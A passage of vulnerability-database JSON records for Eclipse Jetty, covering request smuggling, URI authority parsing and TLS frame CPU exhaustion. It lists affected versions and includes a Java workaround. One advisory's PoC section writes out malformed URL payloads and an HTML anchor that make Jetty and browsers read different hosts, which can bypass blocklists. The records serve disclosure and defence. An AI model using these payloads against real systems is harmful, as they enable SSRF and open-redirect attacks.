request smuggling and can be leveraged to bypass WAF or IDS.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.4.52" } ] } ], "versions": [ "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.51.v20230217", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.51", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-hmr7-m48g-48f6/GHSA-hmr7-m48g-48f6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.16" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.0.15", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-hmr7-m48g-48f6/GHSA-hmr7-m48g-48f6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.16" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.14", "11.0.15", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.15", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-hmr7-m48g-48f6/GHSA-hmr7-m48g-48f6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "12.0.0" }, { "fixed": "12.0.1" } ] } ], "versions": [ "12.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-hmr7-m48g-48f6/GHSA-hmr7-m48g-48f6.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-hmr7-m48g-48f6" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40167" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00039.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5507" }, { "type": "WEB", "url": "https://www.rfc-editor.org/rfc/rfc9110#section-8.6" } ], "database_specific": { "cwe_ids": [ "CWE-130" ], "github_reviewed": true, "github_reviewed_at": "2023-09-14T16:17:27Z", "nvd_published_at": "2023-09-15T20:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qh8g-58pp-2wxh", "published": "2024-10-14T21:11:43Z", "modified": "2025-03-07T14:20:03.913209Z", "aliases": [ "CVE-2024-6763" ], "related": [ "CGA-ff4f-4xw3-x96m", "CGA-gp28-g32p-xvfg", "CGA-r9mv-rv77-836x" ], "summary": "Eclipse Jetty URI parsing of invalid authority", "details": "## Summary\n\nEclipse Jetty is a lightweight, highly scalable, Java-based web server and Servlet engine . It includes a utility class, `HttpURI`, for URI/URL parsing.\n\nThe `HttpURI` class does insufficient validation on the authority segment of a URI. However the behaviour of `HttpURI` differs from the common browsers in how it handles a URI that would be considered invalid if fully validated against the RRC. Specifically `HttpURI` and the browser may differ on the value of the host extracted from an invalid URI and thus a combination of Jetty and a vulnerable browser may be vulnerable to a open redirect attack or to a SSRF attack if the URI is used after passing validation checks.\n\n## Details\n\n### Affected components\n\nThe vulnerable component is the `HttpURI` class when used as a utility class in an application. The Jetty usage of the class is not vulnerable.\n\n### Attack overview\n\nThe `HttpURI` class does not well validate the authority section of a URI. When presented with an illegal authority that may contain user info (eg username:password#@hostname:port), then the parsing of the URI is not failed. Moreover, the interpretation of what part of the authority is the host name differs from a common browser in that they also do not fail, but they select a different host name from the illegal URI.\n\n### Attack scenario\n\nA typical attack scenario is illustrated in the diagram below. The Validator checks whether the attacker-supplied URL is on the blocklist. If not, the URI is passed to the Requester for redirection. The Requester is responsible for sending requests to the hostname specified by the URI.\n\nThis attack occurs when the Validator is the `org.eclipse.jetty.http.HttpURI` class and the Requester is the `Browser` (include chrome, firefox and Safari). An attacker can send a malformed URI to the Validator (e.g., `http://browser.check%23%40vulndetector.com/` ). After validation, the Validator finds that the hostname is not on the blocklist. However, the Requester can still send requests to the domain with the hostname `vulndetector.com`.\n\n## PoC\n\npayloads:\n\n```\nhttp://browser.check \u0026@vulndetector.com/\nhttp://browser.check #@vulndetector.com/\nhttp://browser.check?@vulndetector.com/\nhttp://browser.check#@vulndetector.com/\nhttp://vulndetector.com\\\\/\n```\n\nThe problem of 302 redirect parsing in HTML tag scenarios. Below is a poc example. After clicking the button, the browser will open \"browser.check\", and jetty will parse this URL as \"vulndetector.com\".\n\n```\n\u003ca href=\"http://browser.check#@vulndetector.com/\"\u003e\u003c/a\u003e\n```\nA comparison of the parsing differences between Jetty and chrome is shown in the table below (note that neither should accept the URI as valid).\n\n| Invalid URI | Jetty | Chrome |\n| ---------------------------------------------- | ---------------- | ------------- |\n| http://browser.check \u0026@vulndetector.com/ | vulndetector.com | browser.check |\n| http://browser.check #@vulndetector.com/ | vulndetector.com | browser.check |\n| http://browser.check?@vulndetector.com/ | vulndetector.com | browser.check |\n| http://browser.check#@vulndetector.com/ | vulndetector.com | browser.check |\n\nThe problem of 302 redirect parsing in HTTP 302 Location\n\n| Input | Jetty | Chrome |\n| ------------------------ | -------------- | ------------- |\n| http://browser.check%5c/ | browser.check\\ | browser.check |\n\nIt is noteworthy that Spring Web also faced similar security vulnerabilities, being affected by the aforementioned four types of payloads. These issues have since been resolved and have been assigned three CVE numbers [3-5].\n\n## Impact\n\nThe impact of this vulnerability is limited to developers that use the Jetty HttpURI directly. Example: your project implemented a blocklist to block on some hosts based on HttpURI's handling of authority section. The vulnerability will help attackers bypass the protections that developers have set up for hosts. The vulnerability will lead to **SSRF**[1] and **URL Redirection**[2] vulnerabilities in several cases. \n\n## Mitigation\n\nThe attacks outlined above rely on decoded user data being passed to the `HttpURI` class. Application should not pass decoded user data as an encoded URI to any URI class/method, including `HttpURI`. Such applications are likely to be vulnerable in other ways. \nThe immediate solution is to upgrade to a version of the class that will fully validate the characters of the URI authority. Ultimately, Jetty will deprecate and remove support for user info in the authority per [RFC9110 Section 4.2.4](https://datatracker.ietf.org/doc/html/rfc9110#section-4.2.4). \n\nNote that the Chrome (and other browsers) parse the invalid user info section improperly as well (due to flawed WhatWG URL parsing rules that do not apply outside of a Web Browser).\n\n## Reference\n\n[1] https://cwe.mitre.org/data/definitions/918.html\n[2] https://cwe.mitre.org/data/definitions/601.html", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "12.0.12" } ] } ], "versions": [ "10.0.0", "10.0.0-alpha0", "10.0.0.alpha1", "10.0.0.alpha2", "10.0.0.beta0", "10.0.0.beta1", "10.0.0.beta2", "10.0.0.beta3", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.16", "10.0.17", "10.0.18", "10.0.19", "10.0.2", "10.0.20", "10.0.21", "10.0.22", "10.0.23", "10.0.24", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9", "11.0.0", "11.0.0-alpha0", "11.0.0.beta1", "11.0.0.beta2", "11.0.0.beta3", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.14", "11.0.15", "11.0.16", "11.0.17", "11.0.18", "11.0.19", "11.0.2", "11.0.20", "11.0.21", "11.0.22", "11.0.23", "11.0.24", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9", "12.0.0", "12.0.0.alpha0", "12.0.0.alpha1", "12.0.0.alpha2", "12.0.0.alpha3", "12.0.0.beta0", "12.0.0.beta1", "12.0.0.beta2", "12.0.0.beta3", "12.0.0.beta4", "12.0.1", "12.0.10", "12.0.11", "12.0.2", "12.0.3", "12.0.4", "12.0.5", "12.0.6", "12.0.7", "12.0.8", "12.0.9", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.51.v20230217", "9.4.52.v20230823", "9.4.53.v20231009", "9.4.54.v20240208", "9.4.55.v20240627", "9.4.56.v20240826", "9.4.57.v20241219", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 12.0.11", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-qh8g-58pp-2wxh/GHSA-qh8g-58pp-2wxh.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-qh8g-58pp-2wxh" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6763" }, { "type": "WEB", "url": "https://github.com/jetty/jetty.project/pull/12012" }, { "type": "PACKAGE", "url": "https://github.com/jetty/jetty.project" }, { "type": "WEB", "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/25" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250306-0005" } ], "database_specific": { "cwe_ids": [ "CWE-1286" ], "github_reviewed": true, "github_reviewed_at": "2024-10-14T21:11:43Z", "nvd_published_at": "2024-10-14T16:15:04Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-26vr-8j45-3r4w", "published": "2021-04-06T17:31:30Z", "modified": "2024-03-11T05:36:57.484846Z", "aliases": [ "BIT-jenkins-2021-28165", "CVE-2021-28165" ], "related": [ "CVE-2021-28165" ], "summary": "Jetty vulnerable to incorrect handling of invalid large TLS frame, exhausting CPU resources", "details": "### Impact\nWhen using SSL/TLS with Jetty, either with HTTP/1.1, HTTP/2, or WebSocket, the server may receive an invalid large (greater than 17408) TLS frame that is incorrectly handled, causing CPU resources to eventually reach 100% usage.\n\n### Workarounds\n\nThe problem can be worked around by compiling the following class:\n```java\npackage org.eclipse.jetty.server.ssl.fix6072;\n\nimport java.nio.ByteBuffer;\nimport javax.net.ssl.SSLEngine;\nimport javax.net.ssl.SSLEngineResult;\nimport javax.net.ssl.SSLException;\nimport javax.net.ssl.SSLHandshakeException;\n\nimport org.eclipse.jetty.io.EndPoint;\nimport org.eclipse.jetty.io.ssl.SslConnection;\nimport org.eclipse.jetty.server.Connector;\nimport org.eclipse.jetty.server.SslConnectionFactory;\nimport org.eclipse.jetty.util.BufferUtil;\nimport org.eclipse.jetty.util.annotation.Name;\nimport org.eclipse.jetty.util.ssl.SslContextFactory;\n\npublic class SpaceCheckingSslConnectionFactory extends SslConnectionFactory\n{\n public SpaceCheckingSslConnectionFactory(@Name(\"sslContextFactory\") SslContextFactory factory, @Name(\"next\") String nextProtocol)\n {\n super(factory, nextProtocol);\n }\n\n @Override\n protected SslConnection newSslConnection(Connector connector, EndPoint endPoint, SSLEngine engine)\n {\n return new SslConnection(connector.getByteBufferPool(), connector.getExecutor(), endPoint, engine, isDirectBuffersForEncryption(), isDirectBuffersForDecryption())\n {\n @Override\n protected SSLEngineResult unwrap(SSLEngine sslEngine, ByteBuffer input, ByteBuffer output) throws SSLException\n {\n SSLEngineResult results = super.unwrap(sslEngine, input, output);\n\n if ((results.getStatus() == SSLEngineResult.Status.BUFFER_UNDERFLOW ||\n results.getStatus() == SSLEngineResult.Status.OK \u0026\u0026 results.bytesConsumed() == 0 \u0026\u0026 results.bytesProduced() == 0) \u0026\u0026\n BufferUtil.space(input) == 0)\n {\n BufferUtil.clear(input);\n throw new SSLHandshakeException(\"Encrypted buffer max length exceeded\");\n }\n return results;\n }\n };\n }\n}\n```\nThis class can be deployed by:\n + The resulting class file should be put into a jar file (eg sslfix6072.jar)\n + The jar file should be made available to the server. For a normal distribution this can be done by putting the file into ${jetty.base}/lib\n + Copy the file `${jetty.home}/modules/ssl.mod` to `${jetty.base}/modules`\n + Edit the `${jetty.base}/modules/ssl.mod` file to have the following section:\n\n```\n[lib]\nlib/sslfix6072.jar\n```\n\n+ Copy the file `${jetty.home}/etc/jetty-https.xml` and`${jetty.home}/etc/jetty-http2.xml` to `${jetty.base}/etc`\n+ Edit files `${jetty.base}/etc/jetty-https.xml` and `${jetty.base}/etc/jetty-http2.xml`, changing any reference of `org.eclipse.jetty.server.SslConnectionFactory` to `org.eclipse.jetty.server.ssl.fix6072.SpaceCheckingSslConnectionFactory`. For example:\n```xml\n \u003cCall name=\"addIfAbsentConnectionFactory\"\u003e\n \u003cArg\u003e\n \u003cNew class=\"org.eclipse.jetty.server.ssl.fix6072.SpaceCheckingSslConnectionFactory\"\u003e\n \u003cArg name=\"next\"\u003ehttp/1.1\u003c/Arg\u003e\n \u003cArg name=\"sslContextFactory\"\u003e\u003cRef refid=\"sslContextFactory\"/\u003e\u003c/Arg\u003e\n \u003c/New\u003e\n \u003c/Arg\u003e\n \u003c/Call\u003e\n```\n+ Restart Jetty", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.2.2" }, { "fixed": "9.4.39" } ] } ], "versions": [ "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", 